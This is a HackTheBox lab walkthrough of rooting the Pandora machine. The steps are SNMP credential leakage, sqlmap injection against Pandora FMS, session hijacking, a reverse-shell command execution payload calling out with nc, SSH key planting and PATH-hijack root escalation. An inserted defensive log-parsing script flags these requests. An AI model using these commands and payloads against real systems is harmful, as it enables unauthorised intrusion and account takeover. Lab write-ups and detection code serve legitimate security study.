Pandora HackTheBox WalkThrough

This is a walkthrough of the Pandora HackTheBox machine. In this writeup, I demonstrate step by step how I rooted the Pandora HackTheBox machine. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.11.136 and a difficulty rating of easy assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and make sure you can reach the Pandora machine by pinging its IP 10.10.11.136. If all goes well, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports, and sometimes it helps in vulnerability assessment too. I used nmap for this task and the result is given below:
Scanning
$ sudo nmap -p- -oN full-tcp-scan.nmap --min-rate=10000 10.10.11.136

$ sudo nmap -p22,80 -oN script-scan.nmap -sC -sV 10.10.11.136

$ sudo nmap --top-ports 10 -sU -oN top-udp.nmap 10.10.11.136

$ sudo nmap -p161 -sU -sC -sV -T4 -oN udp-script.nmap 10.10.11.136

————SNIP————
The Nmap full TCP scan revealed ports 22 and 80 as open: OpenSSH is running on port 22 and an Apache2 web server on port 80. The UDP scan of the top 10 ports revealed port 161 as open, with the SNMP service running on it. SNMP is a bit unusual, so let us explore it.
Wikipedia describes Simple Network Management Protocol (SNMP) as an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior. It is widely used in network management for network monitoring. It exposes management data in the form of variables on the managed systems, organized in a Management Information Base (MIB) which describes the system status and configuration.
Enumeration on Port 161
Further enumeration of port 161 using nmap's SNMP scripts revealed the credential daniel : HotelBabylon23.
$ sudo nmap -sU -p161 --script "snmp* and not snmp-brute" 10.10.11.136

———————SNIP———————

———————SNIP———————

You can also use Metasploit's auxiliary module auxiliary/scanner/snmp/snmp_enum for SNMP enumeration. It performs the same task as nmap's SNMP scripts.
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run

———————SNIP———————

———————SNIP———————
Let us use this credential [daniel : HotelBabylon23] to SSH into the Pandora box.
Getting User Shell
$ ssh daniel@10.10.11.136
Password: HotelBabylon23
$ whoami && id

We have successfully logged in to the Pandora box as user daniel. The box has two users, daniel and matt. The user flag is accessible only to matt and root, so when I tried to read it I got an Access Denied message. To capture the flag, we have to log in as user matt. After some enumeration, when I did not find anything interesting, I simply checked all the listening ports on the Pandora box.
Checking the Listening Ports
$ ss -lnpt

Ports 53, 22, 3306 and 80 are listening. Ports 80 and 22 listening is normal [they can be accessed from outside the box]. On the other hand, ports 3306 and 53 are only reachable from localhost, and since we do not have any credentials for them, we cannot access them. I simply curled 127.0.0.1 and found the URI /pandora_console/. This hinted that I should check the URL http://127.0.0.1/pandora_console/. When I checked it, I found different content, which was not accessible through the URL http://10.10.11.136/pandora_console/.
$ curl 127.0.0.1

To access this Pandora Console from our Kali machine, we have to forward the box's port 80 to our localhost. Since we have SSH credentials, we can use them to perform local port forwarding.
Local Port Forwarding
$ ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
Password: HotelBabylon23

After local port forwarding, pandora_console is accessible through the URL http://127.0.0.1/pandora_console/. (Binding local port 80 requires root privileges on the Kali side; a high local port such as 8080 works just as well if you adjust the URL accordingly.)

I tried to log in with the Pandora FMS default credential admin : pandora and with some other credential combinations, but none of them worked. The version of this FMS is also shown on the page, viz. v7.0NG.742_FIX_PERL2020.

I simply googled this version for vulnerabilities and found it is affected by many, namely SQL Injection, Malicious File Execution, Privilege Escalation, XSS and a lot more. Check articles this & this for more info. The SQL injection can be confirmed through the endpoint http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1\

As soon as I confirmed this vulnerability, I dumped the usernames and passwords of all the users.
$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" --dbs --batch --technique=EU --time-sec=30
$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" -D pandora -T tusuario -C fullname,is_admin,password,email --dump --threads=10

Then I tried to crack the hashes using hashcat and the rockyou.txt wordlist, but it could not crack them. So I dumped the session IDs of all the logged-in users from the table tsessions_php and hijacked the session of user matt.
$ sqlmap -u "http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1" -D pandora --dbms=mysql -T tsessions_php --dump --threads=10 --risk=3

———————SNIP———————
Hijacking Session of Matt
Simply replace the PHPSESSID cookie value with g80h3hf7j4u3js38pchlm445kn and then refresh the page. We can see that we have successfully hijacked matt's session and are logged in as matt.

Getting Shell as Matt
According to this post, we can perform Remote Command Execution via the Events feature.
Note: The shell we get here will have the privileges of user matt, because we are currently logged in as matt.
Let us exploit it and get a user shell using the PoC given in this post.
On Kali Machine
$ curl -H "Cookie: PHPSESSID=g80h3hf7j4u3js38pchlm445kn" "http://127.0.0.1/pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.10.17.97+1234+%3E/tmp/f&response_id=1"
On Local Machine
$ nc -nvlp 1234
$ whoami && id

We have successfully got a user shell with the privileges of user matt. Let us upgrade it to a fully interactive TTY shell so that we can run more advanced Linux commands through it.
Note: You will get an access denied message, as below, if matt's session ID has expired. In that case, dump a fresh session ID from the tsessions_php table and use it to hijack matt's session again.
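Both the SQL injection against chart_generator.php and the command execution through the Events feature leave distinctive traces in the Apache access log. The script below is an added example for the defending side, not code from the original post; it parses constructed combined-format log lines and flags those two request shapes (the sample lines and the numeric session_id=1 injection point are taken from this walkthrough, the alert wording is my own):

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (not real Pandora FMS traffic): a normal
# console page load, a sqlmap-style probe of chart_generator.php, and an events
# response request whose `target` carries shell metacharacters.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2022:10:00:01 +0000] "GET /pandora_console/index.php?sec=view HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2022:10:00:05 +0000] "GET /pandora_console/include/chart_generator.php?session_id=1%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 310 "-" "sqlmap/1.6"
127.0.0.1 - - [01/Jan/2022:10:00:09 +0000] "GET /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=id%3bcat+/etc/hostname&response_id=1 HTTP/1.1" 200 88 "-" "curl/7.81"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# PHP session ids are alphanumeric plus ',' and '-'; anything else is injection-shaped.
SESSION_ID_RE = re.compile(r'^[A-Za-z0-9,-]{1,128}$')
SHELL_META = re.compile(r'[;|&`$]|mkfifo|/dev/tcp|\bnc\b')


def analyze_line(line):
    """Return a list of alert strings for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    alerts = []
    parts = urlsplit(m.group("url"))
    q = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    if "sqlmap" in m.group("ua").lower():
        alerts.append("scanner user-agent")
    if parts.path.endswith("/include/chart_generator.php"):
        sid = q.get("session_id", [""])[0]
        if not SESSION_ID_RE.match(sid):
            alerts.append(f"malformed session_id to chart_generator.php: {sid!r}")
    if (parts.path.endswith("/ajax.php") and q.get("page") == ["include/ajax/events"]
            and "perform_event_response" in q):
        target = q.get("target", [""])[0]
        if SHELL_META.search(target):
            alerts.append(f"shell metacharacters in event response target: {target!r}")
    return alerts


def scan_log(text):
    """Map 1-based line numbers of suspicious requests to their alerts."""
    return {n: a for n, line in enumerate(text.splitlines(), 1) if (a := analyze_line(line))}


if __name__ == "__main__":
    for n, alerts in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {'; '.join(alerts)}")
```

Because the console was only reachable through the SSH tunnel, every such request shows up with a 127.0.0.1 client address, which is itself worth alerting on for a web application that is supposed to be reached from outside.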

Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ ^Z # Ctrl+Z to background the shell
$ stty raw -echo
$ fg # then press Enter twice to bring the shell back to the foreground
$ export TERM=xterm

We have successfully upgraded the shell. Let us capture user flag.
Capture User Flag
$ cat /home/matt/user.txt

Privilege Escalation
To escalate privileges to root, we first have to find a privilege escalation vector. We can find a PrivEsc vector either manually or with post-exploitation enumeration scripts like Linpeas.sh, LinEnum.sh and many more; check this link on PayloadsAllTheThings. This time, I used Linpeas.sh for this task.
Finding PrivEsc Vector
Linpeas.sh found a custom SUID binary, pandora_backup, in the directory /usr/bin/. A SUID binary is a file which, when executed by a normal user, runs with the privileges of its owner rather than those of the user who ran it. For example, if a binary has the SUID bit set and is owned by root, then when a normal user executes it, all the commands inside that binary run with root privileges.

Let us check who can execute pandora_backup by checking its permissions.
$ ls -la /usr/bin/pandora_backup

pandora_backup has execute permission for user matt. This binary can be used to escalate privileges via PATH hijacking if the Linux commands invoked inside it are not called by their absolute paths. Let us check whether any Linux command is used without its absolute path inside pandora_backup.
$ cat /usr/bin/pandora_backup

We found that the tar command is used without its absolute path. We can use tar to exploit this weakness and get a root shell. When I tried to get a shell by manipulating the tar command, I got a root shell without much effort. So our privilege escalation vector is PATH hijacking, or privilege escalation by custom SUID exploitation. Check HTB boxes with a similar privilege escalation vector here and here.
Before privilege escalation we first need to get a persistent shell via SSH; only then will our exploit work. I do not know why, but whenever I tried to get root from the current shell, it failed every time. The exploit only worked once I had an SSH shell as user matt, obtained by planting my SSH public key in matt's authorized_keys file. So let us plant our SSH public key in the authorized_keys file.
Implanting SSH Keys
On Kali Machine
$ ssh-keygen # generate new ssh key pair
$ cat id_rsa.pub

Copy the contents of id_rsa.pub to your clipboard and then paste it into the authorized_keys file of user matt. If authorized_keys is not present, create it as below.
On Pandora Machine
$ mkdir .ssh
$ cd .ssh/
$ echo "Your SSH public key here" >authorized_keys
$ cat authorized_keys

Getting Shell as Matt
$ chmod 400 id_rsa
$ ssh -i id_rsa matt@10.10.11.136
$ whoami && id

We have successfully got a persistent shell as user matt. Let us get a root shell by performing privilege escalation.
Getting Root Shell
To get root shell do the following.
$ cd /tmp
$ echo "/bin/bash" > tar
$ export PATH=$(pwd):$PATH
$ chmod +x tar
$ /usr/bin/pandora_backup
# whoami && id

We have successfully got a root shell. Let us capture the root flag.
Capture Root Flag
# cat /root/root.txt

This is how I rooted the Pandora HackTheBox machine. I learnt a lot during this walkthrough; hope you have also learnt something new. Thanks for reading this writeup. Share your experience in the comment section. If you want to give any suggestions about the writeup, feel free to write to us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.
